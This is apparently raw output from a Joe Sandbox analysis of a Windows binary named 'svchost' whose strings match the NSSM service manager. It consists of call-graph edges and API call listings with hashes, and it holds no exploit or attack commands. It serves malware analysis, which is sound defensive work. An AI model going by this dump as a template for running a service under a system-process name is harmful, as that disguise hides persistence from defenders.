11808->11809 11811 418527 __mtinitlocknum InitializeCriticalSectionAndSpinCount 11809->11811 11813 41870a 11809->11813 11810->11757 11811->11813 11876 418752 11813->11876 11815 419bea __write_nolock 11814->11815 11816 419c43 11815->11816 11817 419c1c 11815->11817 11847 419c11 11815->11847 11822 419cab 11816->11822 11823 419c85 11816->11823 11819 415503 __close 67 API calls 11817->11819 11818 412cdc __fputwc_nolock 5 API calls 11820 41a30c 11818->11820 11821 419c21 11819->11821 11820->11765 11826 4154f0 __lseeki64_nolock 67 API calls 11821->11826 11825 419cbf 11822->11825 11880 41a4cb 11822->11880 11824 415503 __close 67 API calls 11823->11824 11827 419c8a 11824->11827 11830 41a6b2 __write_nolock 67 API calls 11825->11830 11829 419c28 11826->11829 11831 4154f0 __lseeki64_nolock 67 API calls 11827->11831 11832 415488 __setmode 6 API calls 11829->11832 11833 419cca 11830->11833 11834 419c93 11831->11834 11832->11847 11835 419f70 11833->11835 11839 416431 __getptd 67 API calls 11833->11839 11836 415488 __setmode 6 API calls 11834->11836 11837 419f80 11835->11837 11838 41a23f WriteFile 11835->11838 11836->11847 11843 41a05e 11837->11843 11862 419f94 11837->11862 11841 41a272 GetLastError 11838->11841 11842 419f52 11838->11842 11840 419ce5 GetConsoleMode 11839->11840 11840->11835 11844 419d10 11840->11844 11841->11842 11845 41a2bd 11842->11845 11842->11847 11849 41a290 11842->11849 11861 41a13e 11843->11861 11864 41a06d 11843->11864 11844->11835 11846 419d22 GetConsoleCP 11844->11846 11845->11847 11848 4154f0 __lseeki64_nolock 67 API calls 11845->11848 11846->11842 11871 419d45 11846->11871 11847->11818 11851 41a2e0 11848->11851 11853 41a29b 11849->11853 11854 41a2af 11849->11854 11850 41a002 WriteFile 11850->11841 11850->11862 11857 415503 __close 67 API calls 11851->11857 11852 41a1a4 WideCharToMultiByte 11852->11841 11859 41a1db WriteFile 11852->11859 11858 4154f0 __lseeki64_nolock 67 API calls 11853->11858 11893 415516 11854->11893 11855 41a0e2 WriteFile 11855->11841 11855->11864 11857->11847 11863 41a2a0 11858->11863 11860 41a212 GetLastError 11859->11860 11859->11861 11860->11861 11861->11842 11861->11845 11861->11852 11861->11859 11862->11842 11862->11845 11862->11850 11866 415503 __close 67 API calls 11863->11866 11864->11842 11864->11845 11864->11855 11866->11847 11867 41a9ca 79 API calls __fassign 11867->11871 11868 41c0a3 11 API calls __putwch_nolock 11868->11871 11869 419df1 WideCharToMultiByte 11869->11842 11870 419e22 WriteFile 11869->11870 11870->11841 11870->11871 11871->11841 11871->11842 11871->11867 11871->11868 11871->11869 11872 419e76 WriteFile 11871->11872 11890 417923 11871->11890 11872->11841 11872->11871 11914 41875b LeaveCriticalSection 11873->11914 11875 41a3e8 11875->11764 11879 4144f2 LeaveCriticalSection 11876->11879 11878 418759 11878->11806 11879->11878 11898 418644 11880->11898 11882 41a4e9 11883 41a4f1 11882->11883 11884 41a502 SetFilePointer 11882->11884 11885 4154f0 __lseeki64_nolock 67 API calls 11883->11885 11886 41a51a GetLastError 11884->11886 11887 41a4f6 11884->11887 11885->11887 11886->11887 11888 41a524 11886->11888 11887->11825 11889 415516 __dosmaperr 67 API calls 11888->11889 11889->11887 11911 4178eb 11890->11911 11894 415503 __close 67 API calls 11893->11894 11895 415521 _realloc 11894->11895 11896 4154f0 __lseeki64_nolock 67 API calls 11895->11896 11897 415534 11896->11897 11897->11847 11899 418651 11898->11899 11900 418669 11898->11900 11901 415503 __close 67 API calls 11899->11901 11902 415503 __close 67 API calls 11900->11902 11908 4186ae 11900->11908 11903 418656 11901->11903 11905 418697 11902->11905 11904 4154f0 __lseeki64_nolock 67 API calls 11903->11904 11906 41865e 11904->11906 11907 4154f0 __lseeki64_nolock 67 API calls 11905->11907 11906->11882 11909 41869e 11907->11909 11908->11882 11910 415488 __setmode 6 API calls 11909->11910 11910->11908 11912 412ac5 _LocaleUpdate::_LocaleUpdate 77 API calls 11911->11912 11913 4178fe 11912->11913 11913->11871 11914->11875 11918 41875b LeaveCriticalSection 11915->11918 11917 41a667 11917->11783 11918->11917 11919->10162

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 337 409b70-409bc2 call 401a00 call 41257c call 413b64 call 413a6d call 41257c call 413b64 call 413a6d call 409920 call 408310 356 409bc4-409bc6 call 413919 337->356 357 409bcb-409bd6 337->357 356->357 359 409eb0-409ec2 TlsAlloc 357->359 360 409bdc-409bf6 call 4097b0 357->360 361 409ec4 call 40a860 359->361 362 409ec9-409ed3 GetStdHandle 359->362 371 409c10-409c22 call 4097b0 360->371 372 409bf8-409c0b call 40ef10 call 413919 360->372 361->362 364 409ed5-409efc StartServiceCtrlDispatcherW 362->364 365 409f0b-409f16 call 4098d0 call 413919 362->365 368 409f41-409f47 call 413919 364->368 369 409efe-409f09 GetLastError 364->369 374 409f1b-409f3c call 4052c0 call 405400 call 408480 call 413919 365->374 369->365 369->374 384 409c24-409c37 call 40ef10 call 413919 371->384 385 409c3c-409c4e call 4097b0 371->385 372->371 374->368 384->385 395 409c50-409c64 call 40ef10 385->395 396 409c7e-409c90 call 4097b0 385->396 403 409c66-409c67 call 413919 395->403 404 409c6c-409c79 call 40ef10 call 413919 395->404 405 409c92-409ca5 call 40ef10 call 413919 396->405 406 409caa-409cbc call 4097b0 396->406 403->404 404->396 405->406 414 409cd6-409ce8 call 4097b0 406->414 415 409cbe-409cd1 call 40ef10 call 413919 406->415 423 409d02-409d14 call 4097b0 414->423 424 409cea-409cfd call 40ef10 call 413919 414->424 415->414 430 409d31-409d43 call 4097b0 423->430 431 409d16-409d2c call 40ef10 call 413919 423->431 424->423 437 409d45-409d4c 430->437 438 409d78-409d8a call 4097b0 430->438 431->430 439 409d62-409d73 call 40fee0 call 413919 437->439 440 409d4e-409d5d call 4099a0 call 413919 437->440 445 409d90-409da2 call 4097b0 438->445 446 409e2f-409e45 call 40daa0 438->446 439->438 440->439 445->446 455 409da8-409dba call 4097b0 445->455 456 409e47-409e4e 446->456 457 409e68-409e6c 446->457 455->446 467 409dbc-409dce call 4097b0 455->467 456->457 461 409e50-409e52 456->461 458 409eaa-409eab call 413919 457->458 459 409e6e 457->459 458->359 462 409e70-409e79 459->462 461->457 465 409e54-409e63 call 4099a0 call 413919 461->465 466 409e80-409e89 462->466 465->457 466->466 470 409e8b-409e96 466->470 467->446 477 409dd0-409de2 call 4097b0 467->477 473 409ea1-409ea4 470->473 474 409e98-409e9f 470->474 473->462 476 409ea6 473->476 474->473 474->474 476->458 477->446 480 409de4-409df6 call 4097b0 477->480 480->359 483 409dfc-409e03 480->483 484 409e05-409e14 call 4099a0 call 413919 483->484 485 409e19-409e2a call 40ebc0 call 413919 483->485 484->485 485->446
                                                    APIs
                                                      • Part of subcall function 00401A00: GetConsoleWindow.KERNEL32 ref: 00401A01
                                                      • Part of subcall function 00401A00: GetWindowThreadProcessId.USER32(00000000), ref: 00401A10
                                                      • Part of subcall function 00401A00: GetCurrentProcessId.KERNEL32 ref: 00401A1A
                                                      • Part of subcall function 00401A00: FreeConsole.KERNEL32 ref: 00401A25
                                                    • __fileno.LIBCMT ref: 00409B86
                                                    • __setmode.LIBCMT ref: 00409B8F
                                                    • __fileno.LIBCMT ref: 00409BA5
                                                    • __setmode.LIBCMT ref: 00409BAE
                                                      • Part of subcall function 00413A6D: ___lock_fhandle.LIBCMT ref: 00413B12
                                                      • Part of subcall function 00413A6D: __setmode_nolock.LIBCMT ref: 00413B2A
                                                      • Part of subcall function 00409920: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00409969
                                                      • Part of subcall function 00409920: CheckTokenMembership.KERNELBASE(00000000,?,0042340D,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040997E
                                                      • Part of subcall function 00409920: FreeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00409989
                                                      • Part of subcall function 00413919: _doexit.LIBCMT ref: 00413925
                                                    • TlsAlloc.KERNEL32(00000000), ref: 00409EB0
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00409ECB
                                                    • StartServiceCtrlDispatcherW.ADVAPI32 ref: 00409EF4
                                                    • GetLastError.KERNEL32 ref: 00409EFE
                                                      • Part of subcall function 004099A0: _memset.LIBCMT ref: 004099BD
                                                      • Part of subcall function 004099A0: GetProcessHeap.KERNEL32 ref: 004099E2
                                                      • Part of subcall function 004099A0: HeapAlloc.KERNEL32(00000000), ref: 004099EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Process$AllocConsoleFreeHeapWindow__fileno__setmode$AllocateCheckCtrlCurrentDispatcherErrorHandleInitializeLastMembershipServiceStartThreadToken___lock_fhandle__setmode_nolock_doexit_memset
                                                    • String ID: NSSM$continue$edit$get$install$pause$remove$reset$restart$rotate$set$start$status$stop$unset
                                                    • API String ID: 4221750250-1322290842
                                                    • Opcode ID: 185ff8e273914152f489ed86a642b69f32b9ea0c6012e47610038ecc76eefd94
                                                    • Instruction ID: 8d0ce95e1571a4db95220a4f6881cac6d3a3a374ab3f9564aeafd07009bbe4f6
                                                    • Opcode Fuzzy Hash: 185ff8e273914152f489ed86a642b69f32b9ea0c6012e47610038ecc76eefd94
                                                    • Instruction Fuzzy Hash: D691A1F1E5030166DA10BA72AC46B5B325D4F6031EF14093FB845B22C7FA7DEE9485AE

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 401b20-401b47 call 412cf0 3 404ec1-404ed6 call 412cdc 0->3 4 401b4d-401b89 AllocConsole GetConsoleWindow GetSystemMenu EnableMenuItem call 40ca70 0->4 9 401b8b-401ba2 GetServiceDisplayNameW 4->9 10 401bbe-401bc4 4->10 11 401ba4-401bb4 call 412d20 9->11 12 401bb7-401bb8 CloseServiceHandle 9->12 13 401be3-404d06 call 412731 SetConsoleTitleW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW GetStdHandle FillConsoleOutputAttribute FillConsoleOutputCharacterW call 401a30 10->13 14 401bc6-401be0 call 412731 10->14 11->12 12->10 22 404d0b-404ec0 call 401a30 call 401ad0 call 401a80 * 5 call 401a30 * 9 call 401ad0 call 401a80 * 8 call 401a30 * 8 call 401ad0 * 2 13->22 14->13 22->3
                                                    APIs
                                                    • AllocConsole.KERNELBASE ref: 00401B50
                                                    • GetConsoleWindow.KERNELBASE ref: 00401B56
                                                    • GetSystemMenu.USER32(00000000,00000000), ref: 00401B5F
                                                    • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00401B6D
                                                      • Part of subcall function 0040CA70: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,?,00401B82,?,?,?,00000001), ref: 0040CA7C
                                                    • GetServiceDisplayNameW.ADVAPI32(00000000,?,?,?), ref: 00401B9A
                                                    • _memset.LIBCMT ref: 00401BAF
                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00401BB8
                                                    • __snwprintf_s.LIBCMT ref: 00401BDB
                                                    • __snwprintf_s.LIBCMT ref: 00401C01
                                                    • SetConsoleTitleW.KERNELBASE(?), ref: 00401C11
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401C1F
                                                    • FillConsoleOutputAttribute.KERNELBASE(00000000,00000000,00000050,?,?), ref: 00401C45
                                                    • FillConsoleOutputCharacterW.KERNELBASE(00000000,00000020,00000050,?,?), ref: 00401C58
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401C5C
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00401C80
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00401C91
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401C95
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00401CB9
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00401CCA
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401CCE
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00401CF2
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00401D03
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401D07
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00401D2B
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00401D3C
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401D40
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000005,?,?), ref: 00401D67
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000005,?,?), ref: 00401D78
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401D7C
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000004,?,?), ref: 00401DA2
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 00401DB3
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401DB7
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000004,?,?), ref: 00401DDD
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 00401DEE
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401DF2
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00401E19
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00401E2A
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401E2E
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000005,?,?), ref: 00401E58
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000005,?,?), ref: 00401E69
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401E6D
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000004,?,?), ref: 00401E96
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 00401EA7
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401EAB
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00401ED5
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00401EE6
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401EEA
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 00401F14
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00401F25
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401F29
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00401F53
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00401F64
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00401F68
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 00401F92
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00401FA3
